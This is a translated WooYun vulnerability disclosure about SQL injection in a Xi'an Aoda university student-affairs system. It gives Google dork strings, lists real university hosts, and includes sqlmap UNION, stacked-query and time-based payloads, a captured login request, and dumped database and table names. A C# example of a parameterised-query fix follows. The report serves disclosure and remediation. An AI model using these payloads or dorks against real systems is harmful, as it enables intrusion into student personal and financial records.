Vulnerability Summary

Defect ID: wooyun-2014-054213

Title: Generic SQL injection vulnerability in a university management system

Vendor: 西安奥达软件工程有限公司 (Xi'an Aoda Software Engineering Co., Ltd.)

Author: Mr.leo

Submitted: 2014-03-27 11:30

Fix time: 2014-06-25 11:30

Published: 2014-06-25 11:30

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability Details

Disclosure status:

2014-03-27: Details sent to the vendor, awaiting vendor handling
2014-04-01: Vendor confirmed; details disclosed to the vendor only
2014-04-04: Details opened to third-party security partners
2014-05-26: Details disclosed to core white hats and experts in related fields
2014-06-05: Details disclosed to regular white hats
2014-06-15: Details disclosed to intern white hats
2014-06-25: Details disclosed to the public

Brief description:

A university management system has a generic SQL injection vulnerability

Detailed description:

Both the front end and the back end of the 高校学生工作管理系统 (University Student Affairs Management System) by 西安奥达软件工程有限公司 have injection vulnerabilities.
1. University Student Affairs Management System front end
intitle:学生工作管理系统 Login/List.aspx?ID=

http://202.117.112.29/login/List.aspx?ID=10
http://xg.chd.edu.cn/Login/List.aspx?ID=99
http://xg.snnu.edu.cn/Login/List.aspx?ID=99
http://202.200.16.19/login/List.aspx?ID=99
http://202.200.168.108/Login/List.aspx?ID=99
Taking http://xg.snnu.edu.cn/Login/List.aspx?ID=99 as an example:
sqlmap identified the following injection points with a total of 100 HTTP(s) requests:
---
Place: POST
Parameter: txtUserId
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58), NULL-- &txtPwd=1&RadioButtonList1=1&Button1=登 录
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=登 录
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=登 录
---
current user: 'auda'
current database: 'StudWorkXiDian'
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] StudWorkXiDian
[*] tempdb
Cross-database access is possible
Database: pubs
[14 tables]
+----------------------+
| [dbo/awthors] |
| [dbo/discounts] |
| [dbo/employee] |
| [dbo/jobs] |
| [dbo/pwb_info] |
| [dbo/pwblishers] |
| [dbo/roysched] |
| [dbo/sales] |
| [dbo/stores\t] |
| [dbo/sysconstraints] |
| [dbo/syssegments] |
| [dbo/titleawthor] |
| [dbo/titles\r\t] |
| [dbo/titleview] |
+----------------------+
2. University Student Affairs Management System back end
Keyword: inurl:/Login/loginpageforuserb.aspx
http://202.117.112.29/Login/loginpageforuserb.aspx
http://xg.chd.edu.cn/Login/loginpageforuserb.aspx
http://xg.snnu.edu.cn/Login/loginpageforuserb.aspx
http://202.200.16.19/Login/loginpageforuserb.aspx
http://202.200.168.108/Login/loginpageforuserb.aspx
http://job.xaufe.edu.cn/Login/loginpageforuserb.aspx
http://219.244.0.28/Login/loginpageforuserb.aspx
http://202.118.166.23/Login/loginpageforuserb.aspx
http://xsc.caac.net/Login/loginpageforuserb.aspx
Taking http://202.117.112.29/Login/loginpageforuserb.aspx as an example:
The username field (txtUserId) is not filtered, which allows injection.
Request captured with Burp:
POST http://202.117.112.29/Login/loginpageforuserb.aspx HTTP/1.1
Host: 202.117.112.29
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://202.117.112.29/Login/loginpageforuserb.aspx
Cookie: ASP.NET_SessionId=oj5sbgn3ovvansabkijagoaz
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 719
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHwECCmRkZI%2B9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=%2FwEWBwLo5YDJCAKz8dy8BQKd%2B7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1&txtPwd=1&RadioButtonList1=1&Button1=%E7%99%BB+%E5%BD%95
Place: POST
Parameter: txtUserId
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58), NULL-- &txtPwd=1&RadioButtonList1=1&Button1=登 录
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=登 录
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=登 录
---
[15:36:02] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[15:36:02] [INFO] fetching current user
current user: 'auda'
[15:36:02] [INFO] fetching current database
current database: 'StudWorkXiDian'
[15:36:02] [INFO] fetching database names
[15:36:02] [INFO] the SQL query used returns 7 entries
[15:36:02] [INFO] resumed: "master"
[15:36:02] [INFO] resumed: "model"
[15:36:02] [INFO] resumed: "msdb"
[15:36:02] [INFO] resumed: "Northwind"
[15:36:02] [INFO] resumed: "pubs"
[15:36:02] [INFO] resumed: "StudWorkXiDian"
[15:36:02] [INFO] resumed: "tempdb"
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] StudWorkXiDian
[*] tempdb
257 tables
Database: StudWorkXiDian
[257 tables]
+-------------------------------+
| dbo.LogTemp |
| dbo.Test |
| dbo.Vstipend_ApplyInfo |
| dbo.Vsubsidy_ApplyInfo |
| dbo.[tsys_Modules_测试] |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.tAcc_File |
| dbo.tAppoinmentRelation |
| dbo.tAppointment |
| dbo.tAppointmentType |
| dbo.tAppointmentTypeExplain |
| dbo.tArr_Accessories |
| dbo.tArr_ArrType |
| dbo.tArr_Auditing |
| dbo.tArr_requiteType |
| dbo.tCadre_InWork |
| dbo.tCadre_OutWork |
| dbo.tCadre_StudWork |
| dbo.tDorm_Area |
| dbo.tDorm_Bed |
| dbo.tDorm_Building |
| dbo.tDorm_ChargeHistory |
| dbo.tDorm_History |
| dbo.tDorm_RewardHistory |
| dbo.tDorm_Room |
| dbo.tDorm_RoomMaster |
| dbo.tDorm_RoomType |
| dbo.tDrom_BuildingUser |
| dbo.tFile_Video |
| dbo.tGB_GMZ |
| dbo.tGB_HYZK |
| dbo.tGB_JKZK |
| dbo.tGB_SJGGHDQ |
| dbo.tGB_XB |
| dbo.tGB_XW |
| dbo.tGB_XZQH |
| dbo.tGB_ZZMM |
| dbo.tJQRY_Apply |
| dbo.tJQRY_SP |
| dbo.tJQRY_Type |
| dbo.tOther_ArcAgent |
| dbo.tOther_ArcBase |
| dbo.tOther_ArcContent |
| dbo.tOther_ArcItem |
| dbo.tOther_ArcTurnOver |
| dbo.tPoor_Student |
| dbo.tPopedom_Atom |
| dbo.tReg_register |
| dbo.tReplyAppointment |
| dbo.tSchoolLoanLevel |
| dbo.tSchoolLoanProportion |
| dbo.tSchoolLoanRefund |
| dbo.tSchoolLoans |
| dbo.tStudCadre_Info |
| dbo.tStudCadre_Type |
| dbo.tStudCadre_Unit |
| dbo.tStud_AllowApply |
| dbo.tTemp_Apply |
| dbo.tarm_AwardList |
| dbo.tarm_CentType |
| dbo.tarm_StudCourse |
| dbo.tarm_StudLevy |
| dbo.tarm_StudRecord |
| dbo.tarm_policy |
| dbo.tarr_Info |
| dbo.tarr_repay |
| dbo.tasl_Affirm |
| dbo.tasl_Bank |
| dbo.tasl_BankAuditing |
| dbo.tasl_BankBargain |
| dbo.tasl_Breach |
| dbo.tasl_End |
| dbo.tasl_Extend |
| dbo.tasl_Familial |
| dbo.tasl_Imburse |
| dbo.tasl_LoanType |
| dbo.tasl_Postponed |
| dbo.tasl_SchoolAuditing |
| dbo.tasl_SchoolAuditingIdea |
| dbo.tasl_StudRequisition |
| dbo.tasl_Whither |
| dbo.tbase_Department |
| dbo.tbase_Teacher |
| dbo.tbase_User |
| dbo.tcgt_StudCourse2 |
| dbo.tcgt_StudCourse3 |
| dbo.tcgt_StudRecord2 |
| dbo.tcgt_StudRecord3 |
| dbo.tcgt_stdResultCell |
| dbo.tcgt_stdResultCell2 |
| dbo.tcgt_stdResultCell3 |
| dbo.tcgt_stdScale2 |
| dbo.tcgt_stdScale3 |
| dbo.tcmoe_RewardLevel |
| dbo.tcmoe_RewardType |
| dbo.tcmoe_StatusChangeCause |
| dbo.tcmoe_StatusChangeType |
| dbo.tcode_Academic |
| dbo.tcode_BloodType |
| dbo.tcode_CultivateMode |
| dbo.tcode_Educate |
| dbo.tcode_Emigrant |
| dbo.tcode_Job |
| dbo.tcode_LoanState |
| dbo.tcode_Post |
| dbo.tcode_ProSchoolAccount |
| dbo.tcode_PsychologyLevel |
| dbo.tcode_StudType |
| dbo.tcode_TeacherRole |
| dbo.tcode_poorType |
| dbo.tcpt_BranchActivity |
| dbo.tcpt_ClassRelation |
| dbo.tcpt_Document |
| dbo.tcpt_MemberStudy |
| dbo.tcpt_PartyActive |
| dbo.tcpt_PartyBranch |
| dbo.tcpt_PartyMember |
| dbo.tcpt_PartyPrep |
| dbo.tcpt_PersonRelation |
| dbo.tcpt_Requisition |
| dbo.terr_Accessories |
| dbo.terr_Auditing |
| dbo.terr_Auditing2 |
| dbo.terr_ErrCause |
| dbo.terr_ErrInfo |
| dbo.terr_ErrType |
| dbo.terr_PunishType |
| dbo.terr_Remove |
| dbo.titem_PartyBranchType |
| dbo.titem_PartyMemberType |
| dbo.titem_PartySchoolType |
| dbo.tmem_BookEnrol |
| dbo.tmem_ChooseCadre |
| dbo.tmem_Development |
| dbo.tmem_DevelopmentNum |
| dbo.tmem_MemBerDocment |
| dbo.tmem_MemCharge |
| dbo.tmem_Member |
| dbo.tmem_OrgType |
| dbo.tmem_Party |
| dbo.tmem_PartyNum |
| dbo.tmem_Record |
| dbo.tmem_Rewards |
| dbo.tmem_TrainDepartment |
| dbo.tmem_TrainManInfo |
| dbo.tmem_orgMan |
| dbo.tmem_organization |
| dbo.tmema_ActivityApply |
| dbo.tmema_ActivityAudit |
| dbo.tmema_ActivityField |
| dbo.tmema_AssnJob |
| dbo.tmema_AssnMember |
| dbo.tmemp_Activity |
| dbo.tmemp_ComAuthor |
| dbo.tmemp_ComManuscript |
| dbo.tmemp_ComReport |
| dbo.tmemp_PublicationIssue |
| dbo.tmemp_PulicJob |
| dbo.tpopedom_UserBackManage |
| dbo.tpopedom_UserModule |
| dbo.treward_Information |
| dbo.treward_InformationG |
| dbo.treward_TypeG |
| dbo.tsafety_InsurePayforMoney |
| dbo.tsafety_InsureRegStudent |
| dbo.tsafety_SafetyGrade |
| dbo.tsafety_Type |
| dbo.tschol_Annotion |
| dbo.tschol_Apply |
| dbo.tschol_Classify |
| dbo.tschol_Quotas |
| dbo.tschol_RankObj |
| dbo.tssc_History |
| dbo.tstipend_Annotion |
| dbo.tstipend_Apply |
| dbo.tstipend_Apply_Temp |
| dbo.tstipend_Classify |
| dbo.tstipend_Quotas |
| dbo.tstipend_RankObj |
| dbo.tstud_Accessories |
| dbo.tstud_CardPrint |
| dbo.tstud_CardPrintFiled |
| dbo.tstud_Family |
| dbo.tstud_FieldEdit |
| dbo.tstud_Student_BKS |
| dbo.tstud_Student_Temp_BKS |
| dbo.tstud_Student_Temp_YJS |
| dbo.tstud_Student_YJS |
| dbo.tsubsidy_Annotion |
| dbo.tsubsidy_Apply |
| dbo.tsubsidy_Apply_Temp |
| dbo.tsubsidy_Classify |
| dbo.tsubsidy_Quotas |
| dbo.tsubsidy_RankObj |
| dbo.tsys_Download |
| dbo.tsys_FriendlyLink |
| dbo.tsys_Notice |
| dbo.tsys_NoticeType |
| dbo.tsys_Options |
| dbo.tsys_VoteList |
| dbo.tsys_VoteProject |
| dbo.tsys_VoteRen |
| dbo.tsys_loginLog |
| dbo.tsys_loginSession |
| dbo.twork_Apply |
| dbo.twork_Apply_Temp |
| dbo.twork_CheckIn |
| dbo.twork_Department |
| dbo.twork_PayMoney |
| dbo.twork_PostObj |
| dbo.twork_PostType |
| dbo.txm_PYFS |
| dbo.txm_SS |
| dbo.txm_XL |
| dbo.txm_XSLX |
| dbo.txm_XSZT |
| dbo.vAloan_ListAff |
| dbo.vAloan_ListBasic |
| dbo.vAloan_ListExtend |
| dbo.vArr_ApplyInfo_BKS |
| dbo.vArr_ApplyInfo_YJS |
| dbo.vCadreGroup_state |
| dbo.vDorm_AllRoomDetail |
| dbo.vDorm_Bed |
| dbo.vDorm_BuidingCode |
| dbo.vDorm_CanBePreared |
| dbo.vDorm_CanUseBed |
| dbo.vDorm_Preared |
| dbo.vDorm_UsedBed |
| dbo.vDorm_building |
| dbo.vDorm_room |
| dbo.vDorm_student |
| dbo.vSchol_QuotaForDept |
| dbo.vSchoolLoans_BKS |
| dbo.vbase_Department |
| dbo.vcgt_StudSumRecord2 |
| dbo.vcgt_StudSumRecord3 |
| dbo.vcgt_student |
| dbo.vparty_PersonRelation |
| dbo.vparty_StatBranchSum |
| dbo.vpopedom_UserModule |
| dbo.vschol_QuotaForClass |
| dbo.vstipend_Classify |
| dbo.vstipend_QuotaForClass |
| dbo.vstipend_QuotaForDept |
| dbo.vstipend_QuotaForGrade |
| dbo.vstud_Student_BKS |
| dbo.vstud_Student_Temp_BKS |
| dbo.vstud_Student_YJS |
| dbo.vsubsidy_Classify |
| dbo.vsubsidy_QuotaForClass |
| dbo.vsubsidy_QuotaForDept |
| dbo.vsubsidy_QuotaForGrade |
| dbo.vtstud_Student_Temp_YJS |
| dbo.vwork_Department |
+-------------------------------+

Proof of vulnerability:

Already proven above

Fix recommendation:

Filter the affected parameters
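The root cause noted above (txtUserId reaching the login query unfiltered) and the fix, as an added example that is not the vendor's code, which is not on this page. AuthenticateUnsafe is a hypothetical reconstruction of the concatenation pattern consistent with the three sqlmap findings; AuthenticateSafe shows the parameterised query that removes the class of bug rather than filtering characters. The table dbo.tbase_User appears in the dump above; the column names UserId and Pwd and the column lengths are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example for the login handler behind loginpageforuserb.aspx (ASP.NET 2.0,
// SQL Server 2000 per the sqlmap banner). Not the vendor's code; dbo.tbase_User is
// taken from the table dump, the column names UserId/Pwd are assumed.
public static class LoginCheck
{
    // Vulnerable pattern (hypothetical reconstruction): txtUserId is spliced into the
    // SQL text. A value like  1' UNION ALL SELECT NULL,... --  or  1'; WAITFOR DELAY '0:0:5';--
    // closes the string literal and appends attacker-controlled SQL, which is exactly what
    // the UNION, stacked-query and time-based findings above rely on.
    public static bool AuthenticateUnsafe(SqlConnection conn, string userId, string pwd)
    {
        string sql = "SELECT COUNT(*) FROM dbo.tbase_User WHERE UserId = '" + userId
                   + "' AND Pwd = '" + pwd + "'";
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // Fixed pattern: the SQL text is a constant and both inputs travel as typed parameters,
    // so a quote or semicolon in userId is just data and there is nothing left to "filter".
    // Parameter lengths (assumed here) should match the column definitions so oversized
    // input is rejected by the driver instead of reaching the server.
    public static bool AuthenticateSafe(SqlConnection conn, string userId, string pwd)
    {
        const string sql =
            "SELECT COUNT(*) FROM dbo.tbase_User WHERE UserId = @userId AND Pwd = @pwd";
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@userId", SqlDbType.NVarChar, 30).Value = userId;
            cmd.Parameters.Add("@pwd", SqlDbType.NVarChar, 50).Value = pwd;
            return (int)cmd.ExecuteScalar() > 0;
        }
    }
}
```

The stacked-query finding also shows that the application login ('auda') can run arbitrary batches and read other databases on the instance, so the fix should be paired with a least-privilege database login; comparing the password in SQL is kept only to mirror the vulnerable version, and a salted hash compared in application code is the better design.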

Copyright notice: when reposting, please credit the source: Mr.leo@乌云 (WooYun)


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2014-04-01 09:12

Vendor reply:

CNVD confirmed and reproduced the multiple instances described; verification and handling were forwarded by CNCERT to the Network Information Center of Shanghai Jiao Tong University.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2014-03-27 14:05 | zzR, Certified White Hat ( Core White Hat | Rank:1382 Vulns:122 | buying WB at 1:5, unlimited [platform escrow])

    Wiping out the zero-reply count

  2. 2014-03-27 14:20 | Mr.leo ( Regular White Hat | Rank:1314 Vulns:176 | What should I even say!!)

    @zzR Your mission is a sacred one